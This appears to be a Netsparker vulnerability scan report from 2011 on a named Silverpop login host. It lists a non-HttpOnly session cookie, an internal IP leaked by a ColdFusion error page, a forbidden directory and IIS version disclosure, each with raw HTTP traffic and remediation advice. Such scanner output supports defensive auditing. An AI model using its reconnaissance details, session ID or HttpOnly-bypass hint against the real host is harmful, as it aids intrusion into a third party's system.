Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
JSESSIONID
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Mar 2011 11:06:33 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: USERID=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,TIMESTAMP=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,AUTHKEY=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,JSESSIONID=3c301ea994f00549756f634f3220e631d502TR;Secure;path=/
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login to Engage B2B</title>
<style type="text/css">
@import url('/library/shared/chrome/css/layout.css');
@import url('/library/shared/content/css/form.css');
@import url('/library/loginmodule/css/login.css');
</style>
<script type="text/javascript" src="/library/shared/chrome/js/prototype.js"></script>
<script type="text/javascript" src="/library/shared/chrome/js/behaviour.js"></script>
</head>
<body>
<div id="app">
<div id="container">
<div id="content">
<form action="/index.cfm?method=cLoginModule.loginUser" method="post" autocomplete="off">
<p class="formRow">
<label for="login" class="prompt required">Email</label>
<div class="element">
<input type="text" id="login" name="login" value="" tabindex="1" class="xxlarge bigField" />
</div>
</p>
<p class="formRow">
<label for="password" class="prompt required">Password</label>
<div class="element">
<input type="password" id="password" name="password" value="" tabindex="2" class="medium bigField" />
<a href="/index.cfm?method=cLoginModule.displayPWDRetrieval" class="note">Forgot Your Password?</a>
</div>
</p>
<p class="element formRow">
<input type="image" id="submit" name="submit" tabindex="3" src="/library/shared/content/grfx/form/login.gif" />
</p>
</form>
<script type="text/javascript">
document.getElementById('login').focus();
</script>
</div>
</div>
</div>
<div id="footer">
<div id="copyright">Silverpop is a registered trademark of Silverpop Systems Inc. All other trademarks are the property of their respective owners. Copyright 2011. All rights reserved.</div>
</div>
</body>
</html>
[Possible] Internal IP Address Leakage
[Possible] Internal IP Address Leakage
Netsparker discovered an internal IP address in the page. It was not determined if the IP address was that of the system itself or that of an internal network.
Impact
This kind of information can be useful for an attacker when combined with other vulnerabilities.
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
10.120.0.37
Request
GET /index.cfm?method=cLoginModule.loginUser HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:06:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Element LOGIN is undefined in ATTRIBUTES.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:06 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
Forbidden Resource
Forbidden Resource
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
- /library/shared/chrome/js/
/library/shared/chrome/js/
CONFIRMED
|
Request
GET /library/shared/chrome/js/ HTTP/1.1
Referer: https://login1.vtrenz.net/library/shared/chrome/js/prototype.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 08 Mar 2011 11:06:33 GMT
<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
IIS Version Disclosure
IIS Version Disclosure
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.
Impact
An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
Microsoft-IIS/6.0
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Mar 2011 11:06:33 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: USERID=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,TIMESTAMP=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,AUTHKEY=;Expires=Tue, 8 Mar 2011 06:06:32 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,JSESSIONID=3c301ea994f00549756f634f3220e631d502TR;Secure;path=/
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login to Engage B2B</title>
<style type="text/css">
@import url('/library/shared/chrome/css/layout.css');
@import url('/library/shared/content/css/form.css');
@import url('/library/loginmodule/css/login.css');
</style>
<script type="text/javascript" src="/library/shared/chrome/js/prototype.js"></script>
<script type="text/javascript" src="/library/shared/chrome/js/behaviour.js"></script>
</head>
<body>
<div id="app">
<div id="container">
<div id="content">
<form action="/index.cfm?method=cLoginModule.loginUser" method="post" autocomplete="off">
<p class="formRow">
<label for="login" class="prompt required">Email</label>
<div class="element">
<input type="text" id="login" name="login" value="" tabindex="1" class="xxlarge bigField" />
</div>
</p>
<p class="formRow">
<label for="password" class="prompt required">Password</label>
<div class="element">
<input type="password" id="password" name="password" value="" tabindex="2" class="medium bigField" />
<a href="/index.cfm?method=cLoginModule.displayPWDRetrieval" class="note">Forgot Your Password?</a>
</div>
</p>
<p class="element formRow">
<input type="image" id="submit" name="submit" tabindex="3" src="/library/shared/content/grfx/form/login.gif" />
</p>
</form>
<script type="text/javascript">
document.getElementById('login').focus();
</script>
</div>
</div>
</div>
<div id="footer">
<div id="copyright">Silverpop is a registered trademark of Silverpop Systems Inc. All other trademarks are the property of their respective owners. Copyright 2011. All rights reserved.</div>
</div>
</body>
</html>